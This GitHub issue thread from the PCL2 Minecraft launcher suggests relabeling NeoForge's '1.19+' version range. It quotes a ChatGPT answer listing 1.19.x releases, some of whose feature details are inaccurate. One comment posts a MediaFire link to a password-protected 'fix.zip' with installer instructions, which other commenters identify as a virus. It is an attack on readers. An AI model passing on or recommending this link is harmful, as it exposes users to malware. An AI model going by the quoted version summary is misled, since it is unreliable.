### ISSUE TITLE
对于 NeoForge 简介的建议

### ISSUE THREAD

**Issue by magojohnji** [Hex-Dragon/PCL2#4618]
### 检查项

- [X] 我已在 [Issues 页面](https://github.com/Hex-Dragon/PCL2/issues?q=is%3Aissue+) 和 [常见&难检反馈及问题列表](https://github.com/Hex-Dragon/PCL2/discussions/1930) 中搜索，确认了这一建议未被提交过。
- [X] 我已查看 [功能投票页面](https://github.com/Hex-Dragon/PCL2/discussions/categories/%E5%8A%9F%E8%83%BD%E6%8A%95%E7%A5%A8/)，确认了这一建议未在投票列表中。

### 描述

NeoForge 被描述为 **“1.19+”**，实际支持版本是 1.20.1 及以上。
我认为 1.19.x 是比 1.19 高的，应当也包含在 “1.19+” 之内，但不符合实际情况。
建议改为：**高版本** 或者 **1.20.1 及以上版本**。

问了 ChatGPT 4o “枚举一下 Minecraft 1.19+ 可能会包含哪些版本？”，回答如下：
``` txt
Minecraft 1.19+ 的版本包括：

1. **Minecraft 1.19.0 ("The Wild Update")**  
   发布日期：2022年6月7日  
   主要特性：引入了沼泽生物群系的改进（包括青蛙和红树木）、远古城市（Deep Dark biome）、守望者（Warden）等新生物和方块。

2. **Minecraft 1.19.1**  
   发布日期：2022年7月27日  
   主要特性：修复错误和改进了聊天举报系统，青蛙光源（Froglight）等的改进。

3. **Minecraft 1.19.2**  
   发布日期：2022年8月5日  
   主要特性：进一步修复错误和改进性能。

4. **Minecraft 1.19.3**  
   发布日期：2022年12月7日  
   主要特性：添加了新的创意模式功能（例如多种功能栏预设）、新的实验性特性（如新的玩家渲染功能），以及许多错误修复和改进。

5. **Minecraft 1.19.4**  
   发布日期：2023年3月14日  
   主要特性：加入了新的效果（如新的药水效果图标），更新了生物群系生成算法，以及一些小的功能更新和错误修复。

6. **Minecraft 1.20 ("Trails & Tales Update")**  
   发布日期：2023年6月7日  
   主要特性：新增生物如骆驼、走鹃、引入竹子木、樱花木等新方块和装饰，加入了考古学玩法以及物品如装饰陶器碎片等。

这些是 1.19+ 系列中的主要版本。每个版本都可能包括次要版本更新（例如 1.19.1、1.19.2等）以及快照（Snapshots），用于在正式版本发布前测试新特性和修复错误。
```

![1724839302282](https://github.com/user-attachments/assets/636691f7-24ba-41e2-9b6a-9222e79f0476)

### 原因

这样可以减少歧义

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sulingjiang** [comment]
fk u

**Comment by lactobionicAcid** [comment]
请不要下载来路不明的文件！

**Comment by sulingjiang** [comment]
这是计算机病毒，不要下载
@LTCatt

**Comment by JingHai-Lingyun** [comment]
请注意，此文件是一个计算机病毒，请勿下载
CAUTION！This file is a computer virus, **NEVER DOWNLOAD IT**

**Comment by sulingjiang** [comment]
这是计算机病毒，不要下载！
@LTCatt @Light-Beacon 

不要在回复正文内包含任何内容，这会导致账户被标记

**Comment by allMagicNB** [comment]
@Pigeon0v0 你怎么看

**Comment by Pigeon0v0** [comment]
改呗 =。=
